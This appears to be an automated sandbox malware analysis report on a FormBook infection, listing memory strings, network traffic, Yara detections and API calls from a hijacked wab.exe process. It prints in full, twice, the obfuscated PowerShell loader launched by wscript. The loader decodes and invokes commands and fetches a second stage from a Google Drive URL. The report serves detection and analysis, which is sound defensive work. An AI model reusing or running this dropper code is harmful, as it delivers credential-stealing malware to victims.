Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=downloadf
Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=downloadh
Source: powershell.exe, 00000002.00000002.2177170811.000002B337F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download
Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2177170811.000002B33858E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7500.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_7728.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7163
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7163
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7163	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7163	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_247035C0 NtCreateMutant,LdrInitializeThunk,	12_2_247035C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_24702C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_24702DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24704650 NtSuspendThread,	12_2_24704650
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24703010 NtOpenDirectoryObject,	12_2_24703010
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24703090 NtSetValueKey,	12_2_24703090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24704340 NtSetContextThread,	12_2_24704340
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702C60 NtCreateKey,	12_2_24702C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702C00 NtQueryInformationProcess,	12_2_24702C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702CF0 NtOpenProcess,	12_2_24702CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702CC0 NtQueryVirtualMemory,	12_2_24702CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702CA0 NtQueryInformationToken,	12_2_24702CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24703D70 NtOpenThread,	12_2_24703D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702D30 NtUnmapViewOfSection,	12_2_24702D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24703D10 NtOpenProcessToken,	12_2_24703D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702D10 NtMapViewOfSection,	12_2_24702D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702D00 NtSetInformationFile,	12_2_24702D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702DD0 NtDelayExecution,	12_2_24702DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702DB0 NtEnumerateKey,	12_2_24702DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702E30 NtWriteVirtualMemory,	12_2_24702E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702EE0 NtQueueApcThread,	12_2_24702EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702EA0 NtAdjustPrivilegesToken,	12_2_24702EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702E80 NtReadVirtualMemory,	12_2_24702E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702F60 NtCreateProcessEx,	12_2_24702F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702F30 NtCreateSection,	12_2_24702F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702FE0 NtCreateFile,	12_2_24702FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702FB0 NtResumeThread,	12_2_24702FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702FA0 NtQuerySection,	12_2_24702FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702F90 NtProtectVirtualMemory,	12_2_24702F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_247039B0 NtGetContextThread,	12_2_247039B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702AF0 NtWriteFile,	12_2_24702AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702AD0 NtReadFile,	12_2_24702AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702AB0 NtWaitForSingleObject,	12_2_24702AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702B60 NtClose,	12_2_24702B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702BF0 NtAllocateVirtualMemory,	12_2_24702BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702BE0 NtQueryValueKey,	12_2_24702BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702BA0 NtEnumerateValueKey,	12_2_24702BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24702B80 NtQueryInformationFile,	12_2_24702B80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF886E4DC82	2_2_00007FF886E4DC82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF886E4CED6	2_2_00007FF886E4CED6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_084E1010	5_2_084E1010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_084E0CC8	5_2_084E0CC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_084E18E0	5_2_084E18E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246C1460	12_2_246C1460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24782446	12_2_24782446
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478F43F	12_2_2478F43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2477E4F6	12_2_2477E4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24787571	12_2_24787571
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D0535	12_2_246D0535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2476D5B0	12_2_2476D5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24790591	12_2_24790591
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246EC6E0	12_2_246EC6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_247816CC	12_2_247816CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D0770	12_2_246D0770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246F4750	12_2_246F4750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246CC7C0	12_2_246CC7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478F7B0	12_2_2478F7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_247870E9	12_2_247870E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478F0E0	12_2_2478F0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D70C0	12_2_246D70C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2477F0CC	12_2_2477F0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2479B16B	12_2_2479B16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246BF172	12_2_246BF172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2470516C	12_2_2470516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246C0100	12_2_246C0100
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2476A118	12_2_2476A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_247881CC	12_2_247881CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_247901AA	12_2_247901AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246DB1B0	12_2_246DB1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24770274	12_2_24770274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_247712ED	12_2_247712ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246EB2C0	12_2_246EB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D52A0	12_2_246D52A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246BD34C	12_2_246BD34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478A352	12_2_2478A352
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478132D	12_2_2478132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246DE3F0	12_2_246DE3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_247903E6	12_2_247903E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2471739A	12_2_2471739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24749C32	12_2_24749C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D0C00	12_2_246D0C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478FCF2	12_2_2478FCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246C0CF2	12_2_246C0CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24770CB5	12_2_24770CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24787D73	12_2_24787D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24781D5A	12_2_24781D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D3D40	12_2_246D3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246DAD00	12_2_246DAD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246CADE0	12_2_246CADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246EFDC0	12_2_246EFDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246E8DBF	12_2_246E8DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D0E59	12_2_246D0E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478EE26	12_2_2478EE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478EEDB	12_2_2478EEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D9EB0	12_2_246D9EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478CE93	12_2_2478CE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246E2E90	12_2_246E2E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24744F40	12_2_24744F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246F0F30	12_2_246F0F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478FF09	12_2_2478FF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246DCFE0	12_2_246DCFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246C2FC8	12_2_246C2FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478FFB1	12_2_2478FFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D1F92	12_2_246D1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D2840	12_2_246D2840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246DA840	12_2_246DA840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D38E0	12_2_246D38E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246FE8F0	12_2_246FE8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246B68B8	12_2_246B68B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246E6962	12_2_246E6962
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D9950	12_2_246D9950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246EB950	12_2_246EB950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246D29A0	12_2_246D29A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2479A9A6	12_2_2479A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24743A6C	12_2_24743A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478FA49	12_2_2478FA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24787A46	12_2_24787A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2477DAC6	12_2_2477DAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24715AA0	12_2_24715AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2476DAAC	12_2_2476DAAC
